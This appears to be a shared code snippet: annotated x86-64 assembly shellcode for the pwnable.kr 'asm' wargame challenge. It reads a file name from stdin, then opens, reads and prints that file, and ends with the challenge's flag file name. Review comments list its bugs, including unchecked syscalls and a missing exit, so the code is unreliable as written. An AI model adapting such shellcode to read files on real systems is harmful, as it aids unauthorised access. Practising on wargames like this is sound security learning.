Created
February 7, 2019 21:52
; This has a segfault and seems to hang after echoing the
; string it read from stdin
#
# Review notes (Linux x86-64, AT&T syntax; raw syscall ABI: rax = nr,
# args in rdi, rsi, rdx; result in rax, negative = -errno):
#   * The two ';' lines above are not comments to GNU as on x86 (';' is a
#     statement separator there; '#' is the comment character) -- confirm
#     which assembler this was built with.
#   * The listing starts mid-sequence: the first syscall below has no
#     visible rax/rdi setup, so it presumably relies on rax = 0 (read)
#     and rdi = 0 (stdin) from code before this excerpt -- TODO confirm.
#   * 0x41414301 is used throughout as one fixed scratch buffer, first
#     for the name read from stdin and then for the file contents.
#   * No syscall result is checked; a failed open() returns a negative
#     value that is carried into rdi for the following read() (see below).
#   * Nothing after the final write ends the program (no exit syscall),
#     so control runs off the end of this code into whatever bytes
#     follow -- a plausible source of the segfault reported above.
movl $0x41414301, %esi                  #; set rsi to memory position for filename (writing esi zero-extends into rsi)
movb $0xff, %dl                         #;; # of bytes to read (low byte only; upper bits of rdx presumably already zero -- confirm)
syscall                                 # read(?, buf, 0xff) -> rax = bytes read, or -errno
# add a null terminator
movb %al, %cl                           # cl = low byte of the count, kept for the echo below
addl $0x41414301, %eax                  # eax = buf + count; an error (negative) return is not checked and would point elsewhere
xor %rdx, %rdx                          # rdx = 0: the terminator byte; also clears rdx for the later counts
movb %dl, (%eax)                        # buf[count] = 0. 32-bit address form, fine while buf+count fits in 32 bits; nothing strips a trailing newline from the name
# Write what we read
xor %rax, %rax
movb $1, %al                            # rax = 1 (write)
movb $1, %dil                           # rdi = 1 (stdout); low byte only, so rdi's upper bytes must already be zero
movl $0x41414301, %esi                  # rsi = buf
movb %cl, %dl                           # rdx = saved count (upper bits zero from the xor above)
syscall                                 # write(1, buf, count): echo the name back
# open file
xor %rax, %rax
movb $2, %al                            # rax = 2 (open)
movl $0x41414301, %edi                  # rdi = buf (NUL-terminated name)
xor %rsi, %rsi                          # flags = 0 (O_RDONLY)
xor %rdx, %rdx                          # mode = 0
syscall                                 # open(buf, 0, 0) -> rax = fd, or -errno (unchecked)
# read file
mov %rax, %rdi                          # rdi = fd -- the full 64-bit value, including a negative errno if open() failed
xor %rax, %rax                          # rax = 0 (read)
movl $0x41414301, %esi                  # rsi = buf (reused; overwrites the name)
movb $0xff, %dl                         # rdx = 0xff (upper bits zero from the xor two lines up)
syscall                                 # read(fd, buf, 0xff) -> rax = bytes read (discarded below)
# Write what we read
xor %rax, %rax
movb $1, %al                            # rax = 1 (write)
movb $1, %dil                           # rdi = 1 (stdout) -- low byte only: rdi still holds the fd from above, so after a failed open() (negative rdi) this yields a bogus fd
movl $0x41414301, %esi                  # rsi = buf
movb $0xff, %dl                         # rdx = 0xff: writes the whole buffer size, not the number of bytes actually read
syscall                                 # write(1, buf, 0xff); no exit syscall follows
# this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong